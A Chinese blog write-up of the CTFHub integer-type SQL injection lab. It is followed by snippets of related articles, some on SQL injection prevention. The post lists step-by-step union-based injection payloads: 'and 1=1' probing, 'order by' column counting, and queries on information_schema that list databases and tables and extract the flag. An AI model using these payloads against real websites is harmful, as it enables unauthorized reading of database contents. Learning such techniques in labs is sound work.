【SQL注入】整数型注入

最新推荐文章于 2024-03-29 16:48:00 发布
最新推荐文章于 2024-03-29 16:48:00 发布
阅读量2.8k 收藏 9
点赞数 5
文章标签: sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/noob_3000/article/details/126206610
版权

题目:CTFHUB整数型注入
在这里插入图片描述

输入

1

2

3

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

“select * from news where id=1”:
在名字为“news”的表中查询id为1的数据
输入

1‘#

在这里插入图片描述1'#中:'单引号让字符型查询语句闭合,#将之后的语句注释掉。若为字符型查询语句应为select * from news where id='1'#',应有回显。此处无回显,可以判断为整数型注入。

输入

1 and 1=1


1 and 1=2

得到
在这里插入图片描述
在这里插入图片描述在and 1=1判断为真时执行了查询并回显,and 1=2判断为假时无回显
说明在查询完“id=1”之后执行了and及其之后的语句,存在SQL注入漏洞

输入

1 order by 2

1 order by 3

得到
在这里插入图片描述在这里插入图片描述
order by:用于对结果集按照一个列或者多个列进行排序(默认升序ASC)

SELECT column_name,column_name
FROM table_name
ORDER BY column_name,column_name ASC|DESC;

order by 1,2,3中,“1”和“2”并不是列名,而是按照列表的“第一列”“第二列”进行排序(默认ASC)
此处我们并不关心回显是什么,即排序于我们是无所谓的,我们写这句话的目的是得到这个表的列数
现在我们可以知道这张表长这个样
— + ---------+
| id | name |
— + ----------+
| 1 |CTFHUB|
— + ---------+
| 2 | skill |
—+ ----------+
使用联合注入

-1 union select 1,2

union合并两个或多个 SELECT 语句的结果。

SELECT column_name(s) FROM table1
UNION
SELECT column_name(s) FROM table2;

UNION 内部的每个 SELECT 语句必须拥有相同数量的列。

这就是为什么我们要在前面使用roder by语句去得到这个表的列数

我们使用了union,但是只希望得到之后select 1,2的结果,所以前一句为select * from news where id=-1,查询无果,不会有回显。

select 1,2并且1,2并不是真实存在于这个表中时:1,2会按照的顺序依次输出

得到
在这里插入图片描述

输入

-1 union select 1,group_concat(schema_name) from information_schema.schemata

group_concat(schema_name)

schema_name

Returns the schema name associated with a schema ID.

schema:数据库对象(表,索引,视图,存储过程等)的集合

group_concat()

该函数返回带有来自一个组的连接的非NULL值的字符串结果。

就是把查询到的数据库名用逗号连接起来组成一个字符串

得到
在这里插入图片描述构造

-1 union select 1,database()

在这里插入图片描述得到当前数据库名sqli
继续构造

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' limit 1

table_name表名
information_schema信息数据库

提供当前项目的元数据视图,不支持跨项目的元数据访问。

是一个存放了当前数据库管理系统中所有数据库信息的一个数据库,数据库只能进行读取,不支持修改(增、删、改)

table_schema数据库名称
limit 1将查询结果一级缓存,即查询到一条数据后就不再继续查询,特定情况下提高查询效率
得到
在这里插入图片描述得知在“sqli”数据库下有两张表,分别名为“flag”和“news”
继续构造

-1 union select 1,group_concat(flag) from sqli.flag	limit 1

在“sqli”数据库下的“flag”表中查询flag项,并限制结果一级缓存
得到
在这里插入图片描述
注入完毕,得到flag

noob_3000
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL 数字型注入详解 + iwebsec实例
m0_50917178的博客
12-04 6239
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、SQL 数字型注入原理二、使用步骤1.引入库2.读入数据总结 前言 本文为作者的学习笔记。其中详细记载了作者对于SQL 数字型注入的理解,同时也介绍了利用union联合查询注入成功的完整过程。本文最后作者利用iwebsec和Webgoat两个平台来进行实战。如果有不足之处,欢迎指正。 提示:以下是本篇文章正文内容,下面案例可供参考 一、SQL 数字型注入原理 当输入的参数为整型时例如:ID、年龄等。如果此时存在注入漏洞,
SQL 整数形注入
MZa1213123的博客
03-02 2643
CTFHub SQL 整数型注入 先 and 1=1 有回显 接着 and 1=2 无回显也就错误页面 判断有 SQL 注入 order by x 爆出几个字段 order by 3 无回显 证明只有两个字段 union 联合查询 常用函数 user() database() session_usr() @@version @@basedir @@datadir @@version_compile_os 得到数据库名后 接着继续爆出该数据库的表名(奇怪.
实例讲解SQL注入攻击
02-26
SQL注入”是一种利用未过滤/未审核用户输入的攻击方法(“缓存溢出”和这个不同),意思就是让应用运行本不应该运行的SQL代码。如果应用毫无防备地创建了SQL字符串并且运行了它们,就会造成一些出人意料的结果。本篇译文由zer0Black翻译自《SQLInjectionAttacksbyExample》。一位客户让我们针对只有他们企业员工和顾客能使用的企业内网进行渗透测试。这是安全评估的一个部分,所以尽管我们之前没有使用过SQL注入来渗透网络,但对其概念也相当熟悉了。最后我们在这任务中大获成功,现在来回顾一下这个过程的每一步,将它记录为一个案例。我们记录下了在多次错误的转折后经历的曲折过程,而
SQL注入操作流程及实例演示+墨者学院靶场SQL手工注入漏洞测试(MySQL数据库)
ran的博客
01-12 1616
在MYsQL5.0以上版本中,Mysql 有一个系统数据库 information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,相当于利用该表可以进行一次完整的注入,通过查询它获取指定数据库下面的表名、列名、具体数据信息。当输入了一些乱七八糟的内容之后,网页返回“404错误”或者进行了跳转,则说明本网站对输入的内容可能有检测,则说明这个网站大概率没有注入漏洞。返回的了两个数字,分别是“2”、“3”,因此,修改网址上的“2”、“3”为对应系统函数来进行信息收集。可以在参数值前加“-”;
sql注入整数型注入
2401_82760239的博客
03-29 852
SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。SQL注入其实就是恶意用户通过在表单中填写包含SQL关键字的数据来使数据库执行非常规代码的过程。简单来说,就是数据「越俎代庖」做了代码才能干的事情。这个问题的来源是,SQL数据库的操作是通过SQL语句来执行的,而无论是执行代码还是数据都必须写在SQL语句之中,这就导致如果我们在数据中加入了某些SQL语句关键字(比如说SELECT、DROP等等),这些关键字就很可能在数据库写入或读取数据时得到执行。
整数型和字符型sql注入
m0_63253040的博客
03-23 1388
首先,先了解mysql数据库基本结构和基本查询语句 数据库基本结构 information_schema 是 mysql 自带的一张表,这张数据表保存了 Mysql 服务器所有数据库的信息,如数据库名,数据库的表,表栏的数据类型与访问权限等。该数据库拥有一个名为 tables 的数据表,该表包含两个字段 table_name 和 table_schema,分别记录 DBMS 中的存储的表名和表名所在的数据库。 意思就是我们通过这个自带的表,去查询我们想要的数据,下面会具体举例 .
sql注入日记
weixin_66484873的博客
01-27 3511
SQL注入笔记
常规SQL注入(整型注入
hxhabcd123的博客
08-29 1478
常规SQL注入(整型注入
CTFHub技能书解题笔记-SQL注入-整数型注入
qq_43006864的博客
12-21 1876
一、到了SQL注入了,这里的话,我建议大家手动注入,要是不熟悉sqlmap的话,建议分别做一遍,这里我附上手动注入的方式。 打开题目 很清楚的告诉我们,整数型注入,还告诉我们输个1试试。 看红字部分。噢哟,直接sql语句都出来了, 这个语句很简单了,大家有sql基础的都看得懂, 然后清晰了。 常规做法,下一步恒真式,and 1=1,冲! 有回显,存在注入点了。他并没有加引号,这里也不需要加--+ # 之类的,直接进行注入就行了。 我习惯再url上进行操作,大家也可以再输入框操
sql整数型/字符型 注入
qq_44985415的博客
08-29 1476
整数型注入 1.检查是否存在注入 and 1=1 返回正确 and 1=2 返回错误 2.猜出字段数 order by x(数字) 得出字段数 3.然后就是爆数据库名information schema三步 ?id=1 and 1=2 union select 1,database() 得到数据库名称sqli 4.爆表名 ?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where
web安全学习-------2.sql整数型注入
阿柠xn
03-10 318
这是作者遇到的一个题目,当然这个题目也很直白,整数型注入。 我们一次填入1,2,3会发现只有1和2有回显,3并没有回显。说明可以查询到的数据有两个。 接着我们测试一下数据有几列: 测试列数: GET:id=1 order by 3# POST:id=1’ order by 3# 我们可以看到3并没有回显,2的时候正常显示,所以数据一共两列。 接下来就是尝试联合查询了,记得把前面的查询数据置空...
如何防止SQL注入.pdf
最新发布
04-02
防止SQL注入主要依赖于以下几种方法: 1. 使用参数化查询(预编译语句) 参数化查询是防止SQL注入的最有效手段之一。通过使用预编译语句(例如,在Java中使用PreparedStatement),可以确保用户输入被当作参数处理...
两个小函数让你的ASP程序对SQL注入免疫!
01-02
Rem ## 长整数转换 Function toNum(s, default) If IsNumeric(s) and s <> “” then toNum = CLng(s) Else toNum = default End If End Function Rem ## SQL 语句转换 Function to...
sqli_lab:学习和练习 SQL 注入的个人实验室
06-28
细绳整数双查询 SQL 注入。 盲 SQL 注入。 细绳整数SQL 注入后。 基于错误更新查询注入。 标头注入基于 Cookie。 绕过WAF。安装: 解压缩内容。 打开数据库文件夹中的文件“config.php”。 使用您的数据库信息更新...
PHP中将字符串转化为整数(int) intval() printf() 性能测试
10-28
早在Sql注入横行的前几年,字符串转化为整数就已经被列为每个web程序必备的操作了。web程序将get或post来的id、整数等值强制经过转化函数转化为整数,过滤掉危险字符,尽可能降低系统本身被Sql注入的可能性
Havij破解版
10-25
 算是比较著名也比较好用的SQL注入工具了。用的人也很多,它经常更新。  正版是要钱的。要感谢国内的破解大牛Hmily。每次多是它破解的最好用了。  这次这个也是它破解的。虽然网上有好几个版本。这个是免安装。...
sql各种注入案例
m0_69435261的博客
09-01 4670
GTID_SUBSET( set1 , set2 ) - 若在 set1 中的 GTID,也在 set2 中,返回 true,否则返回 false ( set1 是 set2 的子集)GTID_SUBTRACT( set1 , set2 ) - 返回在 set1 中,不在 set2 中的 GTID 集合 ( set1 与 set2 的差集)GTID_SUBSET() 和 GTID_SUBTRACT() 函数,我们知道他的输入值是 GTIDset ,当输入有误时,就会报错。GTID_SUBSET函数。
JAVA- SQL注入案例(黑马程序员)和避免 超级详细
meini32的博客
08-01 1872
SQL 注入SQL Injection)是一种常见的网络攻击技术,它利用应用程序没有正确过滤用户输入的数据,将恶意的 SQL 代码注入到应用程序中执行,从而导致应用程序的安全性受到威胁。通过一段字符串(伪造的sql代码)与真的代码进行拼接使整个 SQL语句的条件判断永远为真,从而绕过了应用程序的身份验证机制,获取了用户的数据。应用程序需要对用户输入的数据进行正确的验证和过滤!-概括:拼字符串导致分不清参数和执行的关键字!PreparedStatement接口。输入正确的用户名和密码=登录成功。
CTFHUB——整数型SQL注入
陈艺秋的博客
01-14 1219
整型SQL注入
sql防止sql注入
08-22
SQL中,可以采取以下措施来防止SQL注入攻击: 1. 使用参数化查询(Prepared Statements):这种方法通过将查询参数化,而不是直接将用户输入的值嵌入到查询语句中,来防止注入攻击。参数化查询使用占位符来表示查询中的变量,并在执行查询之前将用户输入的值与占位符绑定。这样可以确保输入的值不会被解释为SQL代码。 2. 输入验证和过滤:对用户输入进行验证和过滤,确保只接受有效和预期的输入。可以使用正则表达式或其他验证方法来检查输入是否符合预期的格式和类型。例如,如果一个字段应该是整数类型,可以验证输入是否为数字类型并且在合理的范围内。 3. 最小化权限:将数据库用户的权限限制到最小必要的操作上,以减少攻击者可以利用的漏洞。例如,只给予读取和写入所需的表的权限,而不是给予完整的数据库管理员权限。 4. 避免动态拼接SQL查询字符串:尽量避免将用户输入直接拼接到SQL查询字符串中,因为这样容易受到注入攻击。如果需要动态构建查询,可以使用参数化查询或者使用ORM(对象关系映射)工具,这些工具会自动处理参数化查询。 5. 日志记录和监控:定期审计数据库日志,以便发现任何可疑的数据库操作。实时监控数据库活动,可以帮助及时发现并阻止潜在的攻击。 请注意,以上措施只是一些常用的方法,但并不能完全保证防止所有的SQL注入攻击。因此,在开发过程中,仍然需要综合考虑其他安全措施来保护数据库和应用程序的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值